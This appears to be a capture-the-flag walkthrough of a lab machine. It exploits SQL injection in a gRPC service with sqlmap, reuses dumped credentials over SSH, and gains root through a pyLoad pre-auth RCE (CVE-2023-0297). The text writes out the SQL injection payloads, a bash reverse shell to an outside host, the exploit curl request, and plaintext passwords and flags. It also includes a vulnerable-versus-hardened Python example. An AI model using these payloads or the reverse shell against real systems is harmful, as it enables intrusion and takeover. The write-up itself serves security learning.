Service overview
IP address: 10.10.11.214. Let's see what nmap shows:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 14:31 EDT
Nmap scan report for 10.10.11.214
Host is up (0.052s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 3072 91:bf:44:ed:ea:1e:32:24:30:1f:53:2c:ea:71:e5:ef (RSA)
| 256 84:86:a6:e2:04:ab:df:f7:1d:45:6c:cf:39:58:09:de (ECDSA)
|_ 256 1a:a8:95:72:51:5e:8e:3c:f1:80:f5:42:fd:0a:28:1c (ED25519)
50051/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 143.21 seconds
$ nc 10.10.11.214 50051
▒?��?�� ?
Looks like a gRPC service.
gRPC
We'll use grpc_cli. Build instructions are here:
- https://github.com/grpc/grpc/blob/master/BUILDING.md
- https://github.com/grpc/grpc/blob/master/doc/command_line_tool.md
Let's get information about the application and its methods.
$ ./grpc_cli ls 10.10.11.214:50051
SimpleApp
grpc.reflection.v1alpha.ServerReflection
$ ./grpc_cli ls 10.10.11.214:50051 SimpleApp -l
filename: app.proto
service SimpleApp {
rpc LoginUser(LoginUserRequest) returns (LoginUserResponse) {}
rpc RegisterUser(RegisterUserRequest) returns (RegisterUserResponse) {}
rpc getInfo(getInfoRequest) returns (getInfoResponse) {}
}
$ ./grpc_cli type 10.10.11.214:50051 LoginUserRequest
message LoginUserRequest {
string username = 1;
string password = 2;
}
$ ./grpc_cli type 10.10.11.214:50051 RegisterUserRequest
message RegisterUserRequest {
string username = 1;
string password = 2;
}
$ ./grpc_cli type 10.10.11.214:50051 getInfoRequest
message getInfoRequest {
string id = 1;
}
Let's try calling each method.
$ ./grpc_cli call 10.10.11.214:50051 RegisterUser "username: 'user', password: 'user'"
connecting to 10.10.11.214:50051
message: "Account created for user user!"
Rpc succeeded with OK status
$ ./grpc_cli call 10.10.11.214:50051 LoginUser "username: 'user', password: 'user'"
connecting to 10.10.11.214:50051
message: "Your id is 767."
Received trailing metadata from server:
token : b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidXNlciIsImV4cCI6MTY4OTExMjA2Mn0.lTZieINh0j7CSujCGiIMM1EuQJY6ZcBXDlF7BqDNnyA'
Rpc succeeded with OK status
Judging by the NoneType error in the next call, the application is written in Python.
$ ./grpc_cli call 10.10.11.214:50051 getInfo "id: '1'" -metadata "token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"
connecting to 10.10.11.214:50051
Sending client initial metadata:
token : eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc
Rpc failed with status code 2, error message: Unexpected <class 'TypeError'>: 'NoneType' object is not subscriptable
$ ./grpc_cli call 10.10.11.214:50051 getInfo "id: '424'" -metadata "token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"
connecting to 10.10.11.214:50051
Sending client initial metadata:
token : eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc
message: "Will update soon."
Rpc succeeded with OK status
Let's use the graphical front-end grpcui - https://github.com/fullstorydev/grpcui
$ ./grpcui --plaintext 10.10.11.214:50051
token b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc'
(screenshot: grpcui)
Let's try supplying the token and logging in (as in the previous step).
We get the NoneType error again.
Save the request in Burp Suite as getInfo.req so that we can try sqlmap against it. Check with sqlmap:
$ sqlmap -r getinfo.req -p data --risk 3
...
sqlmap identified the following injection point(s) with a total of 239 HTTP(s) requests:
---
Parameter: JSON #2* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"}],"data":[{"id":"-4808 OR 2579=2579"}]}
Type: time-based blind
Title: SQLite > 2.0 OR time-based blind (heavy query)
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"}],"data":[{"id":"424 OR 9114=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))"}]}
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"}],"data":[{"id":"424 UNION ALL SELECT CHAR(113,122,98,118,113)||CHAR(117,121,85,73,86,98,115,69,99,86,109,104,100,76,118,103,115,81,99,85,120,82,77,68,81,80,105,120,72,107,69,72,117,74,84,110,108,119,110,84)||CHAR(113,112,118,118,113)-- wLwQ"}]}
---
...
SQL injection found (UNION, boolean-based blind, time-based blind). Let's dump the database:
$ sqlmap -r getinfo.req -p data --risk 3 --dump-all
...
Table: accounts
[2 entries]
+------------------------+----------+
| password | username |
+------------------------+----------+
| admin | admin |
| HereIsYourPassWord1431 | sau |
+------------------------+----------+
...
Table: messages
[1 entry]
+----+----------------------------------------------+----------+
| id | message | username |
+----+----------------------------------------------+----------+
| 1 | The admin is working hard to fix the issues. | admin |
+----+----------------------------------------------+----------+
...
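Why the getInfo call failed with 'NoneType' and why sqlmap's boolean payload worked: an added illustration, not the box's code. The handler is a hypothetical reconstruction of the weak pattern, the database is constructed inline with the same columns as the dump above, and the hardened version next to it shows the fix (integer validation, bound parameter, handled miss, no leaked exception).

```python
import re
import sqlite3
from typing import Optional

# Constructed stand-in for the box's SQLite database; the messages table uses
# the same columns as the sqlmap dump (id, message, username).
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE messages (id INTEGER, message TEXT, username TEXT)")
    db.execute(
        "INSERT INTO messages VALUES (1, 'The admin is working hard to fix the issues.', 'admin')"
    )
    return db

def get_info_vulnerable(db: sqlite3.Connection, user_id: str) -> str:
    # Hypothetical handler in the style that produces the behaviour seen above:
    # the untrusted id is pasted into the SQL text, so the page's boolean payload
    # "-4808 OR 2579=2579" rewrites the WHERE clause, and an unmatched id leaves
    # row == None, which row[0] turns into the 'NoneType' TypeError the server
    # echoed back to the client.
    row = db.execute("SELECT message FROM messages WHERE id = " + user_id).fetchone()
    return row[0]

def get_info_hardened(db: sqlite3.Connection, user_id: str) -> Optional[str]:
    # Same lookup with the two fixes a reviewer would ask for: the id must be an
    # ASCII integer and is bound as a query parameter (sent as data, never as
    # SQL syntax), and a missing row is reported instead of raising.
    if not re.fullmatch(r"[0-9]+", user_id):
        raise ValueError("id must be a non-negative integer")
    row = db.execute(
        "SELECT message FROM messages WHERE id = ?", (int(user_id),)
    ).fetchone()
    return None if row is None else row[0]

def safe_get_info(db: sqlite3.Connection, user_id: str) -> str:
    # gRPC-facing wrapper: every failure maps to a generic client message, so
    # neither the exception class nor the implementation language leaks (the
    # box returned status UNKNOWN with the Python exception text).
    try:
        msg = get_info_hardened(db, user_id)
    except ValueError:
        return "invalid id"
    return msg if msg is not None else "no message for this id"

if __name__ == "__main__":
    db = make_db()
    print(get_info_vulnerable(db, "-4808 OR 2579=2579"))  # injection changes the query
    print(safe_get_info(db, "-4808 OR 2579=2579"))        # rejected before reaching SQL
```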
SSH
Let's try reusing the password from the database to connect over SSH.
$ ssh sau@10.10.11.214
HereIsYourPassWord1431
-bash-5.0$ id
uid=1001(sau) gid=1001(sau) groups=1001(sau)
User flag
-bash-5.0$ ls -la
total 44
drwxr-xr-x 5 sau sau 4096 Jul 11 17:31 .
drwxr-xr-x 3 root root 4096 Jan 11 18:10 ..
lrwxrwxrwx 1 root root 9 Jan 11 18:08 .bash_history -> /dev/null
-rw-r--r-- 1 sau sau 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 sau sau 3771 Feb 25 2020 .bashrc
drwx------ 2 sau sau 4096 Jan 11 17:43 .cache
drwxrwxr-x 3 sau sau 4096 Jul 11 11:23 .local
-rw-r--r-- 1 sau sau 807 Feb 25 2020 .profile
drwx------ 2 sau sau 4096 Jul 11 11:01 .ssh
-rw------- 1 sau sau 1125 Jul 11 17:31 .viminfo
-rw-rw-r-- 1 sau sau 55 Jul 11 14:25 bash.sh
-rw-r----- 1 root sau 33 Jul 11 10:42 user.txt
-bash-5.0$ cat user.txt
ea0e2870b02b9c983ef9e371fb6e90e7
Privilege escalation
Let's see which ports are open. There is an application on port 8000 listening on 127.0.0.1.
-bash-5.0$ netstat -tulpn | grep LISTEN
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9666 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::50051 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Let's forward the port over SSH.
$ ssh -L 127.0.0.1:8000:127.0.0.1:8000 sau@10.10.11.214
HereIsYourPassWord1431
Let's look at the service in a browser: it is pyLoad.
There is a public exploit for an unauthenticated RCE vulnerability in this service (CVE-2023-0297): https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad
# on the remote machine
$ nano /tmp/r.sh
bash -i >& /dev/tcp/10.10.14.220/443 0>&1
# on our own machine
$ nc -lnvp 443
$ curl -i -s -k -X 'POST' --data-binary 'jk=pyimport%20os;os.system(\"bash%20/tmp/r.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' 'http://127.0.0.1:8000/flash/addcrypted2'
Root flag
root@pc:~# ls -la
total 68
drwx------ 7 root root 4096 Apr 27 15:32 .
drwxr-xr-x 21 root root 4096 Apr 27 15:23 ..
lrwxrwxrwx 1 root root 9 Jan 11 17:36 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 4096 Apr 4 10:25 .cache
drwxr-xr-x 3 root root 4096 Apr 4 10:25 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
drwxr-xr-x 7 root root 4096 Jan 11 17:21 .pyload
-rw------- 1 root root 3203 Apr 27 15:32 .viminfo
drwxr-xr-x 3 root root 4096 Apr 27 13:15 Downloads
-rw-r----- 1 root root 33 Jul 11 10:42 root.txt
drwx------ 3 root root 4096 Jan 11 16:56 snap
-rw-r--r-- 1 root root 24576 Jan 11 17:57 sqlite.db.bak
root@pc:~# cat root.txt
f09c10a5010a1e5e4d2bed5a61c864de